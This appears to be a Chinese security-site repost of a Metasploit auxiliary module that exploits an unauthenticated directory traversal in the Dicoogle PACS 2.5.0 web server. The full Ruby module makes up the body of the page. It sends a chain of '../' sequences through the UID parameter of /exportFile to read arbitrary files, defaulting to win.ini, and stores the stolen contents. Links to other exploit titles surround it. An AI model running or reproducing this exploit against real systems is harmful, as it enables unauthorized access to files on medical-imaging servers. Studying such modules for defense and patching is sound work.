首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Dicoogle PACS 2.5.0 Web Server Directory Traversal Exploit
来源:metasploit.com 作者:h00die 发布时间:2018-08-13  
##
# This module requires Metasploit: https://metasploit.com/download
##
  
class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner
  include Msf::Exploit::Remote::HttpClient
  
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Dicoogle PACS Web Server Directory Traversal',
      'Description' => %q{
        This module exploits an unauthenticated directory traversal vulnerability
        in the Dicoogle PACS Web Server v2.5.0 and possibly earlier, allowing an
        attacker to read arbitrary files with the web server privileges.
        While the application is java based, the directory traversal was only
        successful against Windows targets.
      },
      'References'  =>
        [
          ['EDB', '45007']
        ],
      'Author'      =>
        [
          'Carlos Avila', # Vulnerability discovery
          'h00die' # Metasploit module
        ],
      'DisclosureDate' => 'Jul 11 2018',
      'License'     => MSF_LICENSE
    ))
  
    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('FILEPATH', [true, "The path to the file to read", '/windows/win.ini']),
        OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 15 ])
      ])
  
  end
  
  def run_host(ip)
    filename = datastore['FILEPATH']
    traversal = "../" * datastore['DEPTH'] << filename
  
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => '/exportFile',
      'vars_get' => {
        'UID' => traversal
      }
    })
  
    unless res && res.code == 200
      print_error('Nothing was downloaded')
      return
    end
  
    vprint_good("#{peer} - #{res.body}")
    path = store_loot(
      'dicoogle.traversal',
      'text/plain',
      ip,
      res.body,
      filename
    )
    print_good("File saved in: #{path}")
  end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Linux Kernel 4.14.7 (Ubuntu 1
·iSmartViewPro 1.5 - 'Password'
·reSIProcate 1.10.2 - Heap Over
·Microsoft DirectX SDK - 'Xact.
·TP-Link C50 Wireless Router 3
·Monitoring software iSmartView
·TP-Link C50 Wireless Router 3
·IP Finder 1.5 - Denial of Serv
·Mikrotik WinBox 6.42 - Credent
·Oracle Weblogic Server Deseria
·CloudMe Sync 1.10.9 - Buffer O
·PostgreSQL 9.4-0.5.3 - Privile
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved